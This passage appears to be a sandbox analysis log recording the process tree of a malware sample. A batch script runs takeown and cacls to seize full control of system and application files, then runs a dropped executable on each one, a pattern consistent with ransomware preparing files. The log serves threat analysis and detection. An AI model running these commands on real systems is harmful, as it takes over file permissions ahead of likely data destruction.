- - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
    TaBI95AQ.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:3388
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Fc0lVuoI.bat" "C:\Program Files\Windows Photo Viewer\es-ES\ImagingDevices.exe.mui""
  2⤵
  PID:1208
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\es-ES\ImagingDevices.exe.mui" /E /G Admin:F /C
    3⤵
    PID:3304
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\es-ES\ImagingDevices.exe.mui"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:3108
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c TaBI95AQ.exe -accepteula "ImagingDevices.exe.mui" -nobanner
    3⤵
    PID:4072
  - - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
      TaBI95AQ.exe -accepteula "ImagingDevices.exe.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:2688
- - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
    TaBI95AQ.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1788
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Fc0lVuoI.bat" "C:\Program Files\Windows Photo Viewer\it-IT\PhotoAcq.dll.mui""
  2⤵
  PID:1656
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\it-IT\PhotoAcq.dll.mui" /E /G Admin:F /C
    3⤵
    PID:3556
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\it-IT\PhotoAcq.dll.mui"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3136
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c TaBI95AQ.exe -accepteula "PhotoAcq.dll.mui" -nobanner
    3⤵
    PID:1516
  - - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
      TaBI95AQ.exe -accepteula "PhotoAcq.dll.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:940
- - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
    TaBI95AQ.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:2380
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Fc0lVuoI.bat" "C:\Program Files\Windows Photo Viewer\en-US\PhotoAcq.dll.mui""
  2⤵
  PID:1420
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\en-US\PhotoAcq.dll.mui" /E /G Admin:F /C
    3⤵
    PID:1112
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\en-US\PhotoAcq.dll.mui"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:876
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c TaBI95AQ.exe -accepteula "PhotoAcq.dll.mui" -nobanner
    3⤵
    PID:3828
  - - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
      TaBI95AQ.exe -accepteula "PhotoAcq.dll.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:1928
- - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
    TaBI95AQ.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1436
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Fc0lVuoI.bat" "C:\Program Files\Windows Photo Viewer\ImagingDevices.exe""
  2⤵
  PID:908
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\ImagingDevices.exe" /E /G Admin:F /C
    3⤵
    PID:544
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\ImagingDevices.exe"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:2688
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c TaBI95AQ.exe -accepteula "ImagingDevices.exe" -nobanner
    3⤵
    PID:2448
  - - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
      TaBI95AQ.exe -accepteula "ImagingDevices.exe" -nobanner
      4⤵
      Executes dropped EXE
      PID:2516
- - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
    TaBI95AQ.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:2992
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Fc0lVuoI.bat" "C:\Program Files\Windows Security\BrowserCore\en-US\BrowserCore.exe.mui""
  2⤵
  PID:2004
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Security\BrowserCore\en-US\BrowserCore.exe.mui" /E /G Admin:F /C
    3⤵
    PID:3464
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Security\BrowserCore\en-US\BrowserCore.exe.mui"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:940
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c TaBI95AQ.exe -accepteula "BrowserCore.exe.mui" -nobanner
    3⤵
    PID:3696
  - - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
      TaBI95AQ.exe -accepteula "BrowserCore.exe.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:3932
- - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
    TaBI95AQ.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1656
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Fc0lVuoI.bat" "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\CMap\Identity-H""
  2⤵
  PID:1292
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\CMap\Identity-H" /E /G Admin:F /C
    3⤵
    PID:1928
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\CMap\Identity-H"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:3948
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c TaBI95AQ.exe -accepteula "Identity-H" -nobanner
    3⤵
    PID:2500
  - - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
      TaBI95AQ.exe -accepteula "Identity-H" -nobanner
      4⤵
      Executes dropped EXE
      PID:3860
- - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
    TaBI95AQ.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1096
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Fc0lVuoI.bat" "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\CMap\Identity-V""
  2⤵
  PID:4088
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\CMap\Identity-V" /E /G Admin:F /C
    3⤵
    PID:1788
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\CMap\Identity-V"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:2448
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c TaBI95AQ.exe -accepteula "Identity-V" -nobanner
    3⤵
    PID:420
  - - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
      TaBI95AQ.exe -accepteula "Identity-V" -nobanner
      4⤵
      Executes dropped EXE
      PID:3524
- - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
    TaBI95AQ.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1604
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Fc0lVuoI.bat" "C:\Program Files (x86)\Windows Mail\wab.exe""
  2⤵
  PID:3696
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Mail\wab.exe" /E /G Admin:F /C
    3⤵
    PID:2440
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Mail\wab.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3124
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c TaBI95AQ.exe -accepteula "wab.exe" -nobanner
    3⤵
    PID:3828
  - - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
      TaBI95AQ.exe -accepteula "wab.exe" -nobanner
      4⤵
      Executes dropped EXE
      PID:3240
- - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
    TaBI95AQ.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:4012
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Fc0lVuoI.bat" "C:\Program Files (x86)\Windows Photo Viewer\es-ES\ImagingDevices.exe.mui""
  2⤵
  PID:3940
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\es-ES\ImagingDevices.exe.mui" /E /G Admin:F /C
    3⤵
    PID:1292
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\es-ES\ImagingDevices.exe.mui"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:3144
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c TaBI95AQ.exe -accepteula "ImagingDevices.exe.mui" -nobanner
    3⤵
    PID:3372
  - - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
      TaBI95AQ.exe -accepteula "ImagingDevices.exe.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:1532
- - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
    TaBI95AQ.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3524
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Fc0lVuoI.bat" "C:\Program Files (x86)\Windows Photo Viewer\it-IT\PhotoAcq.dll.mui""
  2⤵
  PID:544
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\it-IT\PhotoAcq.dll.mui" /E /G Admin:F /C
    3⤵
    PID:1416
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\it-IT\PhotoAcq.dll.mui"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:2788
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c TaBI95AQ.exe -accepteula "PhotoAcq.dll.mui" -nobanner
    3⤵
    PID:1928
  - - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
      TaBI95AQ.exe -accepteula "PhotoAcq.dll.mui" -nobanner
      4⤵
      PID:3860
- - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
    TaBI95AQ.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4012
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Fc0lVuoI.bat" "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.c0420e39-c8db-4b54-90c3-080a89e51afd.1.etl""
  2⤵
  PID:1292
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.c0420e39-c8db-4b54-90c3-080a89e51afd.1.etl" /E /G Admin:F /C
    3⤵
    PID:3804
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.c0420e39-c8db-4b54-90c3-080a89e51afd.1.etl"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:940
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c TaBI95AQ.exe -accepteula "UpdateSessionOrchestration.c0420e39-c8db-4b54-90c3-080a89e51afd.1.etl" -nobanner
    3⤵
    PID:2988
  - - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
      TaBI95AQ.exe -accepteula "UpdateSessionOrchestration.c0420e39-c8db-4b54-90c3-080a89e51afd.1.etl" -nobanner
      4⤵
      PID:892
- - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
    TaBI95AQ.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3108
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Fc0lVuoI.bat" "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoViewer.dll.mui""
  2⤵
  PID:3524
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoViewer.dll.mui" /E /G Admin:F /C
    3⤵
    PID:3556
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoViewer.dll.mui"
    3⤵
    - Modifies file permissions
    PID:3788
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c TaBI95AQ.exe -accepteula "PhotoViewer.dll.mui" -nobanner
    3⤵
    PID:2968
  - - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
      TaBI95AQ.exe -accepteula "PhotoViewer.dll.mui" -nobanner
      4⤵
      PID:2328
- - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
    TaBI95AQ.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1528
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Fc0lVuoI.bat" "C:\Program Files (x86)\Windows Photo Viewer\it-IT\ImagingDevices.exe.mui""
  2⤵
  PID:2792
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\it-IT\ImagingDevices.exe.mui" /E /G Admin:F /C
    3⤵
    PID:2304
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\it-IT\ImagingDevices.exe.mui"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:384
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c TaBI95AQ.exe -accepteula "ImagingDevices.exe.mui" -nobanner
    3⤵
    PID:3840
  - - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
      TaBI95AQ.exe -accepteula "ImagingDevices.exe.mui" -nobanner
      4⤵
      PID:1684
- - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
    TaBI95AQ.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3932
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Fc0lVuoI.bat" "C:\Program Files (x86)\Windows Photo Viewer\en-US\ImagingDevices.exe.mui""
  2⤵
  PID:1152
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\en-US\ImagingDevices.exe.mui" /E /G Admin:F /C
    3⤵
    PID:1428
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\en-US\ImagingDevices.exe.mui"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2684
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c TaBI95AQ.exe -accepteula "ImagingDevices.exe.mui" -nobanner
    3⤵
    PID:1816
  - - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
      TaBI95AQ.exe -accepteula "ImagingDevices.exe.mui" -nobanner
      4⤵
      PID:996
- - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
    TaBI95AQ.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3104
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Fc0lVuoI.bat" "C:\Program Files (x86)\Windows Photo Viewer\fr-FR\PhotoViewer.dll.mui""
  2⤵
  PID:892
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\fr-FR\PhotoViewer.dll.mui" /E /G Admin:F /C
    3⤵
    PID:2380
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\fr-FR\PhotoViewer.dll.mui"
    3⤵
    PID:2500
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c TaBI95AQ.exe -accepteula "PhotoViewer.dll.mui" -nobanner
    3⤵
    PID:2440
  - - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
      TaBI95AQ.exe -accepteula "PhotoViewer.dll.mui" -nobanner
      4⤵
      PID:3112
- - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
    TaBI95AQ.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3040
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Fc0lVuoI.bat" "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.a367b37d-652f-4d88-9b9d-e3a17dac8879.1.etl""
  2⤵
  PID:764
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.a367b37d-652f-4d88-9b9d-e3a17dac8879.1.etl" /E /G Admin:F /C
    3⤵
    PID:3060
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.a367b37d-652f-4d88-9b9d-e3a17dac8879.1.etl"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:2876
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c TaBI95AQ.exe -accepteula "UpdateSessionOrchestration.a367b37d-652f-4d88-9b9d-e3a17dac8879.1.etl" -nobanner
    3⤵
    PID:2464
  - - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
      TaBI95AQ.exe -accepteula "UpdateSessionOrchestration.a367b37d-652f-4d88-9b9d-e3a17dac8879.1.etl" -nobanner
      4⤵
      PID:1604
- - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
    TaBI95AQ.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1928
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Fc0lVuoI.bat" "C:\Program Files (x86)\Windows Photo Viewer\de-DE\ImagingDevices.exe.mui""
  2⤵
  PID:1420
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\de-DE\ImagingDevices.exe.mui" /E /G Admin:F /C
    3⤵
    PID:3948
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\de-DE\ImagingDevices.exe.mui"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3888
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c TaBI95AQ.exe -accepteula "ImagingDevices.exe.mui" -nobanner
    3⤵
    PID:4088
  - - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
      TaBI95AQ.exe -accepteula "ImagingDevices.exe.mui" -nobanner
      4⤵
      PID:4064
- - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
    TaBI95AQ.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1516
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Fc0lVuoI.bat" "C:\Program Files (x86)\Windows Photo Viewer\es-ES\PhotoViewer.dll.mui""
  2⤵
  PID:4008
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\es-ES\PhotoViewer.dll.mui" /E /G Admin:F /C
    3⤵
    PID:1816
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\es-ES\PhotoViewer.dll.mui"
    3⤵
    PID:3104
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c TaBI95AQ.exe -accepteula "PhotoViewer.dll.mui" -nobanner
    3⤵
    PID:1656
  - - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
      TaBI95AQ.exe -accepteula "PhotoViewer.dll.mui" -nobanner
      4⤵
      PID:1152
- - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
    TaBI95AQ.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:456
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Fc0lVuoI.bat" "C:\Program Files (x86)\Windows Photo Viewer\ja-JP\ImagingDevices.exe.mui""
  2⤵
  PID:3708
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\ja-JP\ImagingDevices.exe.mui" /E /G Admin:F /C
    3⤵
    PID:2380
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\ja-JP\ImagingDevices.exe.mui"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3996
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c TaBI95AQ.exe -accepteula "ImagingDevices.exe.mui" -nobanner
    3⤵
    PID:3980
  - - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
      TaBI95AQ.exe -accepteula "ImagingDevices.exe.mui" -nobanner
      4⤵
      PID:1416
- - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
    TaBI95AQ.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:808
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Fc0lVuoI.bat" "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.b49ce509-b301-4903-bd63-b48b17a010bc.1.etl""
  2⤵
  PID:3936
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.b49ce509-b301-4903-bd63-b48b17a010bc.1.etl" /E /G Admin:F /C
    3⤵
    PID:1540
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.b49ce509-b301-4903-bd63-b48b17a010bc.1.etl"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:3204
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c TaBI95AQ.exe -accepteula "MoUsoCoreWorker.b49ce509-b301-4903-bd63-b48b17a010bc.1.etl" -nobanner
    3⤵
    PID:2636
  - - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
      TaBI95AQ.exe -accepteula "MoUsoCoreWorker.b49ce509-b301-4903-bd63-b48b17a010bc.1.etl" -nobanner
      4⤵
      PID:2464
- - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
    TaBI95AQ.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3828
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Fc0lVuoI.bat" "C:\ProgramData\USOShared\Logs\System\WuProvider.9cbc80f2-3967-41ff-842c-1a3366c13c32.1.etl""
  2⤵
  PID:3128
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\USOShared\Logs\System\WuProvider.9cbc80f2-3967-41ff-842c-1a3366c13c32.1.etl" /E /G Admin:F /C
    3⤵
    PID:544
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\USOShared\Logs\System\WuProvider.9cbc80f2-3967-41ff-842c-1a3366c13c32.1.etl"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:2684
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c TaBI95AQ.exe -accepteula "WuProvider.9cbc80f2-3967-41ff-842c-1a3366c13c32.1.etl" -nobanner
    3⤵
    PID:3332
  - - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
      TaBI95AQ.exe -accepteula "WuProvider.9cbc80f2-3967-41ff-842c-1a3366c13c32.1.etl" -nobanner
      4⤵
      PID:4012
- - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
    TaBI95AQ.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3928
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Fc0lVuoI.bat" "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoAcq.dll.mui""
  2⤵
  PID:1788
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoAcq.dll.mui" /E /G Admin:F /C
    3⤵
    PID:1796
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoAcq.dll.mui"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3784
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c TaBI95AQ.exe -accepteula "PhotoAcq.dll.mui" -nobanner
    3⤵
    PID:1008
  - - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
      TaBI95AQ.exe -accepteula "PhotoAcq.dll.mui" -nobanner
      4⤵
      PID:940
- - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
    TaBI95AQ.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2500
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Fc0lVuoI.bat" "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe""
  2⤵
  PID:1128
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe" /E /G Admin:F /C
    3⤵
    PID:2104
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:316
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c TaBI95AQ.exe -accepteula "ImagingDevices.exe" -nobanner
    3⤵
    PID:892
  - - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
      TaBI95AQ.exe -accepteula "ImagingDevices.exe" -nobanner
      4⤵
      PID:3060
- - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
    TaBI95AQ.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2876
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Fc0lVuoI.bat" "C:\Program Files (x86)\Windows Photo Viewer\de-DE\PhotoViewer.dll.mui""
  2⤵
  PID:1604
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\de-DE\PhotoViewer.dll.mui" /E /G Admin:F /C
    3⤵
    PID:1292
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\de-DE\PhotoViewer.dll.mui"
    3⤵
    PID:2988
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c TaBI95AQ.exe -accepteula "PhotoViewer.dll.mui" -nobanner
    3⤵
    PID:3940
  - - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
      TaBI95AQ.exe -accepteula "PhotoViewer.dll.mui" -nobanner
      4⤵
      PID:544
- - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
    TaBI95AQ.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3460
- C:\Windows\SysWOW64\cmd.exe
